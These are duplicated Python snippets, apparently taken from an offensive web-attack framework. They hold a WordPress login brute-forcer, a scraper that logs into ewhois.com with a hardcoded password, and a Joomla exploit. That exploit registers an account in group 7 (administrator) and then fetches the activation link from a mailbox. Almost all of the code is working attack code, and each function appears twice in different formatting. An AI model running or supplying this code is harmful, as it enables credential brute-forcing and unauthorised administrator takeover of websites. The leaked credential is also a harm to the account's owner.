def run(self, frmwk, args):
module_name = 'attack/web_bruter'
frmwk.print_status('Init paprams!')
victim = HTTP(self.options['URL'], timeout = self.advanced_options['TIMEOUT'])
victim.storecookie = True
checktype = 'successstr'
tokenstr = 'no-unread-messages'
param = 'log=__USER__&pwd=__PASS__&wp-submit=Log+In&redirect_to='+quote_plus(self.options['URL'])+'&testcookie=1'
frmwk.print_status('Start bruteforcer!')
bruter = frmwk.modules[module_name]
bruter.options.addString('URL', 'Link login', default = self.options['URL'])
bruter.options.addString('USERNAME', 'Account login', default = self.options['USERNAME'])
bruter.options.addString('PASSWORD', 'Password login', default = self.options['PASSWORD'])
bruter.options.addString('DATA', 'Date with POST method', default = param)
bruter.options.addString('CHECKTYPE', 'Type of checker success login', default = checktype)
bruter.options.addString('TOKEN', 'Error string', default = tokenstr)
bruter.options.addInteger('THREADS', 'Date with POST method', default = self.options['THREADS'])
bruter.options.addPath('USERLIST', 'passwords to test', default = self.options['USERLIST'])
bruter.options.addPath('PASSLIST', 'usernames to test', default = self.options['PASSLIST'])
bruter.options.addBoolean('VERBOSE', 'Verbose', default = self.options['VERBOSE'])
bruter.advanced_options.addString('COOKIE', 'Cookie', default = victim.headers['Cookie'] if victim.headers['Cookie'] else None)
bruter.advanced_options.addInteger('DELAY', 'Delay time', default = self.advanced_options['DELAY'])
bruter.advanced_options.addInteger('TIMEOUT', 'Time out request', default = self.advanced_options['TIMEOUT'])
bruter.advanced_options.addBoolean('STOP', 'Stop scanning', default = True)
bruter.run(frmwk, None)
frmwk.reload_module(module_name)
def run(self, frmwk, args):
module_name = 'attack/web_bruter'
frmwk.print_status('Init paprams!')
victim = HTTP(self.options['URL'],
timeout=self.advanced_options['TIMEOUT'])
victim.storecookie = True
checktype = 'successstr'
tokenstr = 'no-unread-messages'
param = 'log=__USER__&pwd=__PASS__&wp-submit=Log+In&redirect_to=' + quote_plus(
self.options['URL']) + '&testcookie=1'
frmwk.print_status('Start bruteforcer!')
bruter = frmwk.modules[module_name]
bruter.options.addString('URL',
'Link login',
default=self.options['URL'])
bruter.options.addString('USERNAME',
'Account login',
default=self.options['USERNAME'])
bruter.options.addString('PASSWORD',
'Password login',
default=self.options['PASSWORD'])
bruter.options.addString('DATA',
'Date with POST method',
default=param)
bruter.options.addString('CHECKTYPE',
'Type of checker success login',
default=checktype)
bruter.options.addString('TOKEN', 'Error string', default=tokenstr)
bruter.options.addInteger('THREADS',
'Date with POST method',
default=self.options['THREADS'])
bruter.options.addPath('USERLIST',
'passwords to test',
default=self.options['USERLIST'])
bruter.options.addPath('PASSLIST',
'usernames to test',
default=self.options['PASSLIST'])
bruter.options.addBoolean('VERBOSE',
'Verbose',
default=self.options['VERBOSE'])
bruter.advanced_options.addString('COOKIE',
'Cookie',
default=victim.headers['Cookie'] if
victim.headers['Cookie'] else None)
bruter.advanced_options.addInteger(
'DELAY', 'Delay time', default=self.advanced_options['DELAY'])
bruter.advanced_options.addInteger(
'TIMEOUT',
'Time out request',
default=self.advanced_options['TIMEOUT'])
bruter.advanced_options.addBoolean('STOP',
'Stop scanning',
default=True)
bruter.run(frmwk, None)
frmwk.reload_module(module_name)
def eWhois(self, searcher):
params = urlencode({'_method':'POST','data[User][email]':'*****@*****.**','data[User][password]':'RitX:::R1tX','data[User][remember_me]':'0'})
req = HTTP("http://www.ewhois.com/")
req.storecookie = True
req.rand_useragent = False
data = req.Request('http://www.ewhois.com/login/', 'POST', params)
data = req.Request("http://www.ewhois.com/export/ip-address/%s/" % self.ip)
urls = findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""',data)
self.frmwk.print_status(self.fmt_string.format(searcher['SITE'],urls.__len__()))
self.domains += urls
def run(self, frmwk, args):
url = self.options['URL']
email = CONFIG.GMAIL_ACCOUNT[0]
self.username = '******' + str(randint(1000,100000))
self.password = '******'
victim = HTTP(url)
victim.storecookie = True
exploit = 'jform%5Bname%5D=exploit&jform%5Busername%5D=exploit&jform%5Bpassword1%5D=123123&jform%5Bpassword2%5D=1231233&jform%5Bemail1%5D=pentest%40yahoo.com&jform%5Bemail2%5D=pentest%40yahoo.com&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'
registry = 'jform%5Bname%5D={0}&jform%5Busername%5D={0}&jform%5Bpassword1%5D={1}&jform%5Bpassword2%5D={1}&jform%5Bemail1%5D={2}&jform%5Bemail2%5D={2}&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'.format(self.username, self.password, email)
frmwk.print_status('Init token')
data = victim.Request(url)
token = search('name="([a-zA-Z0-9]{32})"\svalue="1"', data)
if token:
token = token.group(1)
else:
token = ''
frmwk.print_status('Send false request')
url = url + '?task=registration.register'
victim.Request(url, 'POST', exploit + token + '=1')
frmwk.print_status('Send exploit request')
data = victim.Request(url, 'POST', registry + token + '=1')
warning = search('class="warning\smessage">(.*?)</dd>', data, DOTALL)
message = search('class="message\smessage">(.*?)</dd>', data, DOTALL)
if warning:
frmwk.print_error('Error during exploit : ' + warning.group(1))
return
elif message:
frmwk.print_success('Successful : ' + message.group(1).strip())
frmwk.print_success('Account login: %s | %s' % (self.username, self.password))
else:
frmwk.print_status('Hên xui !')
frmwk.print_status('Sleep 30s for mail receiver !')
sleep(30)
for email in self.getMail():
active = search('(http(.*?)activate&token=(.*?))\s', email['body'], DOTALL)
if active:
active_link = active.group(1)
frmwk.print_status('Active link: ' + active_link)
break
if active_link:
data = victim.Request(active_link)
message = search('class="message\smessage">(.*?)</dd>', data, DOTALL)
if message:
frmwk.print_success('Actived Account: %s | %s' % (self.username, self.password))
def eWhois(self, searcher):
params = urlencode({
'_method': 'POST',
'data[User][email]': '*****@*****.**',
'data[User][password]': 'RitX:::R1tX',
'data[User][remember_me]': '0'
})
req = HTTP("http://www.ewhois.com/")
req.storecookie = True
req.rand_useragent = False
data = req.Request('http://www.ewhois.com/login/', 'POST', params)
data = req.Request("http://www.ewhois.com/export/ip-address/%s/" %
self.ip)
urls = findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""', data)
self.frmwk.print_status(
self.fmt_string.format(searcher['SITE'], urls.__len__()))
self.domains += urls
